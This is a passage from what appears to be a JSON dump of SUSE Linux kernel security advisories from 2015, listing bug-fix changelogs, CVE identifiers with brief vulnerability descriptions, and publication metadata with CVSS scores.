Btrfs: fix deadlock with extent-same and readpage (bsc#937612).\n - Btrfs: fix fsync data loss after append write (bsc#936446).\n - Btrfs: fix hang during inode eviction due to concurrent readahead\n (bsc#935085).\n - Btrfs: fix memory leak in the extent_same ioctl (bsc#937613).\n - Btrfs: fix race when reusing stale extent buffers that leads to BUG_ON\n (bsc#926369).\n - Btrfs: fix use after free when close_ctree frees the orphan_rsv\n (bsc#938022).\n - Btrfs: pass unaligned length to btrfs_cmp_data() (bsc#937609).\n - Btrfs: provide super_operations->inode_get_dev (bsc#927455).\n - Drivers: hv: balloon: check if ha_region_mutex was acquired in\n MEM_CANCEL_ONLINE case.\n - Drivers: hv: fcopy: process deferred messages when we complete the\n transaction.\n - Drivers: hv: fcopy: rename fcopy_work -> fcopy_timeout_work.\n - Drivers: hv: fcopy: set .owner reference for file operations.\n - Drivers: hv: fcopy: switch to using the hvutil_device_state state\n machine.\n - Drivers: hv: hv_balloon: correctly handle num_pages>INT_MAX case.\n - Drivers: hv: hv_balloon: correctly handle val.freeram lower than\n num_pages case.\n - Drivers: hv: hv_balloon: do not lose memory when onlining order is not\n natural.\n - Drivers: hv: hv_balloon: do not online pages in offline blocks.\n - Drivers: hv: hv_balloon: eliminate jumps in piecewiese linear floor\n function.\n - Drivers: hv: hv_balloon: eliminate the trylock path in\n acquire/release_region_mutex.\n - Drivers: hv: hv_balloon: keep locks balanced on add_memory() failure.\n - Drivers: hv: hv_balloon: refuse to balloon below the floor.\n - Drivers: hv: hv_balloon: report offline pages as being used.\n - Drivers: hv: hv_balloon: survive ballooning request with num_pages=0.\n - Drivers: hv: kvp: move poll_channel() to hyperv_vmbus.h.\n - Drivers: hv: kvp: rename kvp_work -> kvp_timeout_work.\n - Drivers: hv: kvp: reset kvp_context.\n - Drivers: hv: kvp: switch to using the hvutil_device_state state machine.\n - Drivers: hv: 
util: Fix a bug in the KVP code. reapply upstream change\n ontop of v3.12-stable change\n - Drivers: hv: util: On device remove, close the channel after\n de-initializing the service.\n - Drivers: hv: util: introduce hv_utils_transport abstraction.\n - Drivers: hv: util: introduce state machine for util drivers.\n - Drivers: hv: util: move kvp/vss function declarations to hyperv_vmbus.h.\n - Drivers: hv: vmbus: Add device and vendor ID to vmbus devices.\n - Drivers: hv: vmbus: Add support for VMBus panic notifier handler\n (bsc#934160).\n - Drivers: hv: vmbus: Add support for the NetworkDirect GUID.\n - Drivers: hv: vmbus: Correcting truncation error for constant\n HV_CRASH_CTL_CRASH_NOTIFY (bsc#934160).\n - Drivers: hv: vmbus: Export the vmbus_sendpacket_pagebuffer_ctl().\n - Drivers: hv: vmbus: Fix a bug in rescind processing in\n vmbus_close_internal().\n - Drivers: hv: vmbus: Fix a siganlling host signalling issue.\n - Drivers: hv: vmbus: Get rid of some unnecessary messages.\n - Drivers: hv: vmbus: Get rid of some unused definitions.\n - Drivers: hv: vmbus: Handle both rescind and offer messages in the same\n context.\n - Drivers: hv: vmbus: Implement the protocol for tearing down vmbus state.\n - Drivers: hv: vmbus: Introduce a function to remove a rescinded offer.\n - Drivers: hv: vmbus: Perform device register in the per-channel work\n element.\n - Drivers: hv: vmbus: Permit sending of packets without payload.\n - Drivers: hv: vmbus: Properly handle child device remove.\n - Drivers: hv: vmbus: Remove the channel from the channel list(s) on\n failure.\n - Drivers: hv: vmbus: Suport an API to send packet with additional control.\n - Drivers: hv: vmbus: Suport an API to send pagebuffers with additional\n control.\n - Drivers: hv: vmbus: Teardown clockevent devices on module unload.\n - Drivers: hv: vmbus: Teardown synthetic interrupt controllers on module\n unload.\n - Drivers: hv: vmbus: Use a round-robin algorithm for picking the\n outgoing channel.\n - 
Drivers: hv: vmbus: Use the vp_index map even for channels bound to CPU\n 0.\n - Drivers: hv: vmbus: avoid double kfree for device_obj.\n - Drivers: hv: vmbus: briefly comment num_sc and next_oc.\n - Drivers: hv: vmbus: decrease num_sc on subchannel removal.\n - Drivers: hv: vmbus: distribute subchannels among all vcpus.\n - Drivers: hv: vmbus: do cleanup on all vmbus_open() failure paths.\n - Drivers: hv: vmbus: introduce vmbus_acpi_remove.\n - Drivers: hv: vmbus: kill tasklets on module unload.\n - Drivers: hv: vmbus: move init_vp_index() call to vmbus_process_offer().\n - Drivers: hv: vmbus: prevent cpu offlining on newer hypervisors.\n - Drivers: hv: vmbus: rename channel work queues.\n - Drivers: hv: vmbus: teardown hv_vmbus_con workqueue and vmbus_connection\n pages on shutdown.\n - Drivers: hv: vmbus: unify calls to percpu_channel_enq().\n - Drivers: hv: vmbus: unregister panic notifier on module unload.\n - Drivers: hv: vmbus:Update preferred vmbus protocol version to windows 10.\n - Drivers: hv: vss: process deferred messages when we complete the\n transaction.\n - Drivers: hv: vss: switch to using the hvutil_device_state state machine.\n - Enable CONFIG_BRIDGE_NF_EBTABLES on s390x (bsc#936012)\n - Fix connection reuse when sk_error_report is used (bsc#930972).\n - GHES: Carve out error queueing in a separate function (bsc#917630).\n - GHES: Carve out the panic functionality (bsc#917630).\n - GHES: Elliminate double-loop in the NMI handler (bsc#917630).\n - GHES: Make NMI handler have a single reader (bsc#917630).\n - GHES: Panic right after detection (bsc#917630).\n - IB/mlx4: Fix wrong usage of IPv4 protocol for multicast attach/detach\n (bsc#918618).\n - Initialize hv_netvsc_packet->xmit_more to avoid transfer stalls\n - KVM: PPC: BOOK3S: HV: CMA: Reserve cma region only in hypervisor mode\n (bsc#908491).\n - KVM: s390: virtio-ccw: Handle command rejects (bsc#931860).\n - MODSIGN: loading keys from db when SecureBoot disabled (bsc#929696).\n - MODSIGN: 
loading keys from db when SecureBoot disabled (bsc#929696).\n - PCI: pciehp: Add hotplug_lock to serialize hotplug events (bsc#866911).\n - Revert "MODSIGN: loading keys from db when SecureBoot disabled". This\n reverts commit b45412d4, because it breaks legacy boot.\n - SUNRPC: Report connection error values to rpc_tasks on the pending queue\n (bsc#930972).\n - Update s390x kabi files with netfilter change (bsc#936012)\n - client MUST ignore EncryptionKeyLength if CAP_EXTENDED_SECURITY is set\n (bsc#932348).\n - cpufreq: pcc: Enable autoload of pcc-cpufreq for ACPI processors\n (bsc#933117).\n - dmapi: fix value from newer Linux strnlen_user() (bsc#932897).\n - drm/i915/hsw: Fix workaround for server AUX channel clock divisor\n (bsc#935918).\n - drm/i915: Evict CS TLBs between batches (bsc#935918).\n - drm/i915: Fix DDC probe for passive adapters (bsc#935918).\n - drm/i915: Handle failure to kick out a conflicting fb driver\n (bsc#935918).\n - drm/i915: drop WaSetupGtModeTdRowDispatch:snb (bsc#935918).\n - drm/i915: save/restore GMBUS freq across suspend/resume on gen4\n (bsc#935918).\n - edd: support original Phoenix EDD 3.0 information (bsc#929974).\n - ext4: fix over-defensive complaint after journal abort (bsc#935174).\n - fs/cifs: Fix corrupt SMB2 ioctl requests (bsc#931124).\n - ftrace: add oco handling patch (bsc#924526).\n - ftrace: allow architectures to specify ftrace compile options\n (bsc#924526).\n - ftrace: let notrace function attribute disable hotpatching if necessary\n (bsc#924526).\n - hugetlb, kabi: do not account hugetlb pages as NR_FILE_PAGES\n (bsc#930092).\n - hugetlb: do not account hugetlb pages as NR_FILE_PAGES (bsc#930092).\n - hv: channel: match var type to return type of wait_for_completion.\n - hv: do not schedule new works in vmbus_onoffer()/vmbus_onoffer_rescind().\n - hv: hv_balloon: match var type to return type of wait_for_completion.\n - hv: hv_util: move vmbus_open() to a later place.\n - hv: hypervvssd: call endmntent before 
call setmntent again.\n - hv: no rmmod for hv_vmbus and hv_utils.\n - hv: remove the per-channel workqueue.\n - hv: run non-blocking message handlers in the dispatch tasklet.\n - hv: vmbus: missing curly braces in vmbus_process_offer().\n - hv: vmbus_free_channels(): remove the redundant free_channel().\n - hv: vmbus_open(): reset the channel state on ENOMEM.\n - hv: vmbus_post_msg: retry the hypercall on some transient errors.\n - hv_netvsc: Allocate the receive buffer from the correct NUMA node.\n - hv_netvsc: Allocate the sendbuf in a NUMA aware way.\n - hv_netvsc: Clean up two unused variables.\n - hv_netvsc: Cleanup the test for freeing skb when we use sendbuf\n mechanism.\n - hv_netvsc: Define a macro RNDIS_AND_PPI_SIZE.\n - hv_netvsc: Eliminate memory allocation in the packet send path.\n - hv_netvsc: Fix a bug in netvsc_start_xmit().\n - hv_netvsc: Fix the packet free when it is in skb headroom.\n - hv_netvsc: Implement batching in send buffer.\n - hv_netvsc: Implement partial copy into send buffer.\n - hv_netvsc: Use the xmit_more skb flag to optimize signaling the host.\n - hv_netvsc: change member name of struct netvsc_stats.\n - hv_netvsc: introduce netif-msg into netvsc module.\n - hv_netvsc: remove unused variable in netvsc_send().\n - hv_netvsc: remove vmbus_are_subchannels_present() in\n rndis_filter_device_add().\n - hv_netvsc: try linearizing big SKBs before dropping them.\n - hv_netvsc: use per_cpu stats to calculate TX/RX data.\n - hv_netvsc: use single existing drop path in netvsc_start_xmit.\n - hv_vmbus: Add gradually increased delay for retries in vmbus_post_msg().\n - hyperv: Implement netvsc_get_channels() ethool op.\n - hyperv: hyperv_fb: match wait_for_completion_timeout return type.\n - iommu/amd: Handle integer overflow in dma_ops_area_alloc (bsc#931538).\n - iommu/amd: Handle large pages correctly in free_pagetable (bsc#935881).\n - ipr: Increase default adapter init stage change timeout (bsc#930579).\n - ipv6: do not delete 
previously existing ECMP routes if add fails\n (bsc#930399).\n - ipv6: fix ECMP route replacement (bsc#930399).\n - jbd2: improve error messages for inconsistent journal heads (bsc#935174).\n - jbd2: revise KERN_EMERG error messages (bsc#935174).\n - kabi/severities: Add s390 symbols allowed to change in bsc#931860\n - kabi: only use sops->get_inode_dev with proper fsflag.\n - kernel: add panic_on_warn.\n - kexec: allocate the kexec control page with KEXEC_CONTROL_MEMORY_GFP\n (bsc#928131).\n - kgr: fix redirection on s390x arch (bsc#903279).\n - kgr: move kgr_task_in_progress() to sched.h.\n - kgr: send a fake signal to all blocking tasks.\n - kvm: irqchip: Break up high order allocations of kvm_irq_routing_table\n (bsc#926953).\n - libata: Blacklist queued TRIM on all Samsung 800-series (bsc#930599).\n - mei: bus: () can be static.\n - mm, thp: really limit transparent hugepage allocation to local node (VM\n Performance, bsc#931620).\n - mm, thp: respect MPOL_PREFERRED policy with non-local node (VM\n Performance, bsc#931620).\n - mm/mempolicy.c: merge alloc_hugepage_vma to alloc_pages_vma (VM\n Performance, bsc#931620).\n - mm/thp: allocate transparent hugepages on local node (VM Performance,\n bsc#931620).\n - net/mlx4_en: Call register_netdevice in the proper location (bsc#858727).\n - net/mlx4_en: Do not attempt to TX offload the outer UDP checksum for\n VXLAN (bsc#858727).\n - net: fib6: fib6_commit_metrics: fix potential NULL pointer dereference\n (bsc#867362).\n - net: introduce netdev_alloc_pcpu_stats() for drivers.\n - net: ipv6: fib: do not sleep inside atomic lock (bsc#867362).\n - netdev: set __percpu attribute on netdev_alloc_pcpu_stats.\n - netdev_alloc_pcpu_stats: use less common iterator variable.\n - netfilter: xt_NFQUEUE: fix --queue-bypass regression (bsc#935083)\n - ovl: default permissions (bsc#924071).\n - ovl: move s_stack_depth .\n - powerpc/perf/hv-24x7: use kmem_cache instead of aligned stack\n allocations (bsc#931403).\n - 
powerpc/pseries: Correct cpu affinity for dlpar added cpus (bsc#932967).\n - powerpc: Add VM_FAULT_HWPOISON handling to powerpc page fault handler\n (bsc#929475).\n - powerpc: Fill in si_addr_lsb siginfo field (bsc#929475).\n - powerpc: Simplify do_sigbus (bsc#929475).\n - reiserfs: Fix use after free in journal teardown (bsc#927697).\n - rtlwifi: rtl8192cu: Fix kernel deadlock (bsc#927786).\n - s390/airq: add support for irq ranges (bsc#931860).\n - s390/airq: silence lockdep warning (bsc#931860).\n - s390/compat,signal: change return values to -EFAULT (bsc#929879).\n - s390/ftrace: hotpatch support for function tracing (bsc#924526).\n - s390/irq: improve displayed interrupt order in /proc/interrupts\n (bsc#931860).\n - s390/kernel: use stnsm 255 instead of stosm 0 (bsc#929879).\n - s390/kgr: reorganize kgr infrastructure in entry64.S.\n - s390/mm: align 64-bit PIE binaries to 4GB (bsc#929879).\n - s390/mm: limit STACK_RND_MASK for compat tasks (bsc#929879).\n - s390/rwlock: add missing local_irq_restore calls (bsc#929879).\n - s390/sclp_vt220: Fix kernel panic due to early terminal input\n (bsc#931860).\n - s390/smp: only send external call ipi if needed (bsc#929879).\n - s390/spinlock,rwlock: always to a load-and-test first (bsc#929879).\n - s390/spinlock: cleanup spinlock code (bsc#929879).\n - s390/spinlock: optimize spin_unlock code (bsc#929879).\n - s390/spinlock: optimize spinlock code sequence (bsc#929879).\n - s390/spinlock: refactor arch_spin_lock_wait[_flags] (bsc#929879).\n - s390/time: use stck clock fast for do_account_vtime (bsc#929879).\n - s390: Remove zfcpdump NR_CPUS dependency (bsc#929879).\n - s390: add z13 code generation support (bsc#929879).\n - s390: avoid z13 cache aliasing (bsc#929879).\n - s390: fix control register update (bsc#929879).\n - s390: optimize control register update (bsc#929879).\n - s390: z13 base performance (bsc#929879).\n - sched: fix __sched_setscheduler() vs load balancing race (bsc#921430)\n - scsi: retry MODE SENSE 
on unit attention (bsc#895814).\n - scsi_dh_alua: Recheck state on unit attention (bsc#895814).\n - scsi_dh_alua: fixup crash in alua_rtpg_work() (bsc#895814).\n - scsi_dh_alua: parse device id instead of target id (bsc#895814).\n - scsi_dh_alua: recheck RTPG in regular intervals (bsc#895814).\n - scsi_dh_alua: update all port states (bsc#895814).\n - sd: always retry READ CAPACITY for ALUA state transition (bsc#895814).\n - st: null pointer dereference panic caused by use after kref_put by\n st_open (bsc#936875).\n - supported.conf: add btrfs to kernel-$flavor-base (bsc#933637)\n - udf: Remove repeated loads blocksize (bsc#933907).\n - usb: core: Fix USB 3.0 devices lost in NOTATTACHED state after a hub\n port reset (bsc#938024).\n - vTPM: set virtual device before passing to ibmvtpm_reset_crq\n (bsc#937087).\n - vfs: add super_operations->get_inode_dev (bsc#927455).\n - virtio-ccw: virtio-ccw adapter interrupt support (bsc#931860).\n - virtio-rng: do not crash if virtqueue is broken (bsc#931860).\n - virtio: fail adding buffer on broken queues (bsc#931860).\n - virtio: virtio_break_device() to mark all virtqueues broken (bsc#931860).\n - virtio_blk: verify if queue is broken after virtqueue_get_buf()\n (bsc#931860).\n - virtio_ccw: fix hang in set offline processing (bsc#931860).\n - virtio_ccw: fix vcdev pointer handling issues (bsc#931860).\n - virtio_ccw: introduce device_lost in virtio_ccw_device (bsc#931860).\n - virtio_net: do not crash if virtqueue is broken (bsc#931860).\n - virtio_net: verify if queue is broken after virtqueue_get_buf()\n (bsc#931860).\n - virtio_ring: adapt to notify() returning bool (bsc#931860).\n - virtio_ring: add new function virtqueue_is_broken() (bsc#931860).\n - virtio_ring: change host notification API (bsc#931860).\n - virtio_ring: let virtqueue_{kick()/notify()} return a bool (bsc#931860).\n - virtio_ring: plug kmemleak false positive (bsc#931860).\n - virtio_scsi: do not call virtqueue_add_sgs(... 
GFP_NOIO) holding\n spinlock (bsc#931860).\n - virtio_scsi: verify if queue is broken after virtqueue_get_buf()\n (bsc#931860).\n - vmxnet3: Bump up driver version number (bsc#936423).\n - vmxnet3: Changes for vmxnet3 adapter version 2 (fwd) (bug#936423).\n - vmxnet3: Fix memory leaks in rx path (fwd) (bug#936423).\n - vmxnet3: Register shutdown handler for device (fwd) (bug#936423).\n - x86/PCI: Use host bridge _CRS info on Foxconn K8M890-8237A (bsc#907092).\n - x86/PCI: Use host bridge _CRS info on systems with >32 bit addressing\n (bsc#907092).\n - x86/kgr: move kgr infrastructure from asm to C.\n - x86/mm: Improve AMD Bulldozer ASLR workaround (bsc#937032).\n - xfrm: release dst_orig in case of error in xfrm_lookup() (bsc#932793).\n - xfs: Skip dirty pages in ->releasepage (bsc#915183).\n - xfs: fix xfs_setattr for DMAPI (bsc#932900).\n - xfs_dmapi: fix transaction ilocks (bsc#932899).\n - xfs_dmapi: fix value from newer Linux strnlen_user() (bsc#932897).\n - xfs_dmapi: xfs_dm_rdwr() uses dir file ops not file's ops (bsc#932898).\n\n", "edition": 1, "modified": "2015-07-31T10:08:48", "published": "2015-07-31T10:08:48", "id": "SUSE-SU-2015:1324-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00049.html", "title": "Security update for the SUSE Linux Enterprise 12 kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:27:15", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1420", "CVE-2015-5364", "CVE-2015-2922", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2014-9729", "CVE-2015-3636", "CVE-2014-9710", "CVE-2015-2041", "CVE-2014-9731", "CVE-2015-4700", "CVE-2015-1805"], "description": "The SUSE Linux Enterprise 11 SP3 Teradata kernel was updated to fix the\n following bugs and security issues.\n\n The following security issues have been fixed:\n\n - Update patches.fixes/udp-fix-behavior-of-wrong-checksums.patch\n (bsc#936831, 
CVE-2015-5364, CVE-2015-5366).\n - Btrfs: make xattr replace operations atomic (bnc#923908, CVE-2014-9710).\n - udp: fix behavior of wrong checksums (bsc#936831, CVE-2015-5364,\n CVE-2015-5366).\n - vfs: read file_handle only once in handle_to_path (bsc#915517,\n CVE-2015-1420).\n - x86: bpf_jit: fix compilation of large bpf programs\n (bnc#935705,CVE-2015-4700).\n - udf: Check length of extended attributes and allocation (bsc#936831,\n CVE-2015-5364, CVE-2015-5366).\n - Update patches.fixes/udf-Check-component-length-before-reading-it.patch\n (bsc#933904, CVE-2014-9728, CVE-2014-9730).\n - Update patches.fixes/udf-Verify-i_size-when-loading-inode.patch\n (bsc#933904, CVE-2014-9728, CVE-2014-9729).\n - Update patches.fixes/udf-Verify-symlink-size-before-loading-it.patch\n (bsc#933904, CVE-2014-9728).\n - Update patches.fixes/udf-Check-path-length-when-reading-symlink.patch\n (bnc#933896, CVE-2014-9731).\n - pipe: fix iov overrun for failed atomic copy (bsc#933429, CVE-2015-1805).\n - ipv6: Don't reduce hop limit for an interface (bsc#922583,\n CVE-2015-2922).\n - net: llc: use correct size for sysctl timeout entries (bsc#919007,\n CVE-2015-2041).\n - ipv4: Missing sk_nulls_node_init() in ping_unhash() (bsc#929525,\n CVE-2015-3636).\n\n The following non-security issues have been fixed:\n\n - mlx4: Check for assigned VFs before disabling SR-IOV (bsc#927355).\n - ixgbe: Use pci_vfs_assigned instead of ixgbe_vfs_are_assigned\n (bsc#927355).\n - pci: Add SRIOV helper function to determine if VFs are assigned to guest\n (bsc#927355).\n - net/mlx4_core: Don't disable SRIOV if there are active VFs (bsc#927355).\n - udf: Remove repeated loads blocksize (bsc#933907).\n - Refresh 
patches.fixes/deal-with-deadlock-in-d_walk-fix.patch, based on\n 3.2 stable fix 20defcec264c ("dcache: Fix locking bugs in backported\n "deal with deadlock in d_walk()""). Not harmful for regular SLES\n kernels but RT or PREEMPT kernels would see imbalance.\n - sched: Fix potential near-infinite distribute_cfs_runtime() loop\n (bnc#930786)\n - tty: Correct tty buffer flush (bnc#929647).\n - tty: hold lock across tty buffer finding and buffer filling (bnc#929647).\n\n", "edition": 1, "modified": "2015-07-10T16:08:16", "published": "2015-07-10T16:08:16", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00023.html", "id": "SUSE-SU-2015:1224-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:43:03", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2015-1420", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2015-0777", "CVE-2014-9729", "CVE-2015-2150", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-5707", "CVE-2015-4700", "CVE-2015-1805"], "description": "The SUSE Linux Enterprise 11 SP3 kernel was updated to receive various\n security and bugfixes.\n\n Following security bugs were fixed:\n\n - CVE-2015-5707: An integer overflow in the SCSI generic driver could be\n potentially used by local attackers to crash the kernel or execute code\n (bsc#940338).\n - CVE-2015-5364: A remote denial of service (hang) via UDP flood with\n incorrect packet checksums was fixed. (bsc#936831).\n - CVE-2015-5366: A remote denial of service (unexpected error returns) via\n UDP flood with incorrect packet checksums was fixed. 
(bsc#936831).\n - CVE-2015-1420: A race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel allowed local users to bypass intended\n size restrictions and trigger read operations on additional memory\n locations by changing the handle_bytes value of a file handle during the\n execution of this function (bnc#915517).\n - CVE-2015-4700: A local user could have created a bad instruction in the\n JIT processed BPF code, leading to a kernel crash (bnc#935705).\n - CVE-2015-4167: The UDF filesystem in the Linux kernel was vulnerable to\n a crash which could occur while fetching inode information from a\n corrupted/malicious udf file system image. (bsc#933907).\n - CVE-2014-9728 CVE-2014-9729 CVE-2014-9730 CVE-2014-9731: Various issues\n in handling UDF filesystems in the Linux kernel allowed the corruption\n of kernel memory and other issues. An attacker able to mount a\n corrupted/malicious UDF file system image could cause the kernel to\n crash. (bsc#933904 bsc#933896)\n - CVE-2015-2150: The Linux kernel did not properly restrict access to PCI\n command registers, which might have allowed local guest users to cause a\n denial of service (non-maskable interrupt and host crash) by disabling\n the (1) memory or (2) I/O decoding for a PCI Express device and then\n accessing the device, which triggers an Unsupported Request (UR)\n response (bsc#919463).\n - CVE-2015-0777: drivers/xen/usbback/usbback.c as used in the Linux kernel\n 2.6.x and 3.x in SUSE Linux distributions, allowed guest OS users to\n obtain sensitive information from uninitialized locations in host OS\n kernel memory via unspecified vectors (bnc#917830).\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux kernel did not\n prevent the TS_COMPAT flag from reaching a user-mode task, which might\n have allowed local users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1) fork or (2) close\n system call, as demonstrated by an 
attack against seccomp before 3.16\n (bnc#926240).\n - CVE-2015-1805: The Linux kernel's implementation of vectored pipe read\n and write functionality did not take into account the I/O vectors that\n were already processed when retrying after a failed atomic access\n operation, potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could use this flaw to\n crash the system or, potentially, escalate their privileges on the\n system. (bsc#933429).\n\n\n Also the following non-security bugs were fixed:\n - audit: keep inode pinned (bsc#851068).\n - btrfs: be aware of btree inode write errors to avoid fs corruption\n (bnc#942350).\n - btrfs: check if previous transaction aborted to avoid fs corruption\n (bnc#942350).\n - btrfs: deal with convert_extent_bit errors to avoid fs corruption\n (bnc#942350).\n - cifs: Fix missing crypto allocation (bnc#937402).\n - client MUST ignore EncryptionKeyLength if CAP_EXTENDED_SECURITY is set\n (bnc#932348).\n - drm: ast,cirrus,mgag200: use drm_can_sleep (bnc#883380, bsc#935572).\n - drm/cirrus: do not attempt to acquire a reservation while in an\n interrupt handler (bsc#935572).\n - drm/mgag200: do not attempt to acquire a reservation while in an\n interrupt handler (bsc#935572).\n - drm/mgag200: Do not do full cleanup if mgag200_device_init fails.\n - ext3: Fix data corruption in inodes with journalled data (bsc#936637)\n - ext4: handle SEEK_HOLE/SEEK_DATA generically (bsc#934944).\n - fanotify: Fix deadlock with permission events (bsc#935053).\n - fork: reset mm->pinned_vm (bnc#937855).\n - hrtimer: prevent timer interrupt DoS (bnc#886785).\n - hugetlb: do not account hugetlb pages as NR_FILE_PAGES (bnc#930092).\n - hugetlb, kabi: do not account hugetlb pages as NR_FILE_PAGES\n (bnc#930092).\n - IB/core: Fix mismatch between locked and pinned pages (bnc#937855).\n - iommu/amd: Fix memory leak in free_pagetable (bsc#935866).\n - iommu/amd: Handle integer overflow in 
dma_ops_area_alloc (bsc#931538).\n - iommu/amd: Handle large pages correctly in free_pagetable (bsc#935866).\n - ipr: Increase default adapter init stage change timeout (bsc#930761).\n - ixgbe: Use pci_vfs_assigned instead of ixgbe_vfs_are_assigned\n (bsc#927355).\n - kdump: fix crash_kexec()/smp_send_stop() race in panic() (bnc#937444).\n - kernel: add panic_on_warn. (bsc#934742)\n - kvm: irqchip: Break up high order allocations of kvm_irq_routing_table\n (bnc#926953).\n - libata: prevent HSM state change race between ISR and PIO (bsc#923245).\n - md: use kzalloc() when bitmap is disabled (bsc#939994).\n - megaraid_sas: Use correct reset sequence in adp_reset() (bsc#894936).\n - mlx4: Check for assigned VFs before disabling SR-IOV (bsc#927355).\n - mm/hugetlb: check for pte NULL pointer in __page_check_address()\n (bnc#929143).\n - mm: restrict access to slab files under procfs and sysfs (bnc#936077).\n - net: fib6: fib6_commit_metrics: fix potential NULL pointer dereference\n (bsc#867362).\n - net: Fix "ip rule delete table 256" (bsc#873385).\n - net: ipv6: fib: do not sleep inside atomic lock (bsc#867362).\n - net/mlx4_core: Do not disable SRIOV if there are active VFs (bsc#927355).\n - nfsd: Fix nfsv4 opcode decoding error (bsc#935906).\n - nfsd: support disabling 64bit dir cookies (bnc#937503).\n - nfs: never queue requests with rq_cong set on the sending queue\n (bsc#932458).\n - nfsv4: Minor cleanups for nfs4_handle_exception and\n nfs4_async_handle_error (bsc#939910).\n - pagecache limit: add tracepoints (bnc#924701).\n - pagecache limit: Do not skip over small zones that easily (bnc#925881).\n - pagecache limit: export debugging counters via /proc/vmstat (bnc#924701).\n - pagecache limit: fix wrong nr_reclaimed count (bnc#924701).\n - pagecache limit: reduce starvation due to reclaim retries (bnc#925903).\n - pci: Add SRIOV helper function to determine if VFs are assigned to guest\n (bsc#927355).\n - pci: Disable Bus Master only on kexec reboot 
(bsc#920110).\n - pci: disable Bus Master on PCI device shutdown (bsc#920110).\n - pci: Disable Bus Master unconditionally in pci_device_shutdown()\n (bsc#920110).\n - pci: Don't try to disable Bus Master on disconnected PCI devices\n (bsc#920110).\n - perf, nmi: Fix unknown NMI warning (bsc#929142).\n - perf/x86/intel: Move NMI clearing to end of PMI handler (bsc#929142).\n - rtlwifi: rtl8192cu: Fix kernel deadlock (bnc#927786).\n - sched: fix __sched_setscheduler() vs load balancing race (bnc#921430)\n - scsi_error: add missing case statements in scsi_decide_disposition()\n (bsc#920733).\n - scsi: Set hostbyte status in scsi_check_sense() (bsc#920733).\n - scsi: set host msg status correctly (bnc#933936)\n - scsi: vmw_pvscsi: Fix pvscsi_abort() function (bnc#940398 bsc#930934).\n - st: null pointer dereference panic caused by use after kref_put by\n st_open (bsc#936875).\n - udf: Remove repeated loads blocksize (bsc#933907).\n - usb: core: Fix USB 3.0 devices lost in NOTATTACHED state after a hub\n port reset (bnc#937641).\n - vmxnet3: Bump up driver version number (bsc#936423).\n - vmxnet3: Changes for vmxnet3 adapter version 2 (fwd) (bug#936423).\n - vmxnet3: Fix memory leaks in rx path (fwd) (bug#936423).\n - vmxnet3: Register shutdown handler for device (fwd) (bug#936423).\n - x86/mm: Improve AMD Bulldozer ASLR workaround (bsc#937032).\n - x86, tls: Interpret an all-zero struct user_desc as "no segment"\n (bsc#920250).\n - x86, tls, ldt: Stop checking lm in LDT_empty (bsc#920250).\n - xenbus: add proper handling of XS_ERROR from Xenbus for transactions.\n - xfs: avoid mounting of xfs filesystems with inconsistent option\n (bnc#925705)\n - zcrypt: Fixed reset and interrupt handling of AP queues (bnc#936925,\n LTC#126491).\n\n", "edition": 1, "modified": "2015-09-23T11:09:59", "published": "2015-09-23T11:09:59", "id": "SUSE-SU-2015:1611-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00021.html", "type": "suse", "title": "Security 
update for the Linux Kernel (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:18:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2015-1420", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2015-0777", "CVE-2014-9729", "CVE-2015-2150", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-5707", "CVE-2015-4700", "CVE-2015-1805"], "description": "The SUSE Linux Enterprise 11 SP3 Realtime kernel was updated to receive\n various security and bugfixes.\n\n The following feature was added for RT:\n - FATE#317131: The SocketCAN (Peak PCI) driver was added for CAN bus\n support.\n\n Following security bugs were fixed:\n\n - CVE-2015-5707: An integer overflow in the SCSI generic driver could be\n potentially used by local attackers to crash the kernel or execute code\n (bsc#940338).\n - CVE-2015-5364: A remote denial of service (hang) via UDP flood with\n incorrect packet checksums was fixed. (bsc#936831).\n - CVE-2015-5366: A remote denial of service (unexpected error returns) via\n UDP flood with incorrect packet checksums was fixed. (bsc#936831).\n - CVE-2015-1420: A race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel allowed local users to bypass intended\n size restrictions and trigger read operations on additional memory\n locations by changing the handle_bytes value of a file handle during the\n execution of this function (bnc#915517).\n - CVE-2015-4700: A local user could have created a bad instruction in the\n JIT processed BPF code, leading to a kernel crash (bnc#935705).\n - CVE-2015-4167: The UDF filesystem in the Linux kernel was vulnerable to\n a crash which could occur while fetching inode information from a\n corrupted/malicious udf file system image. 
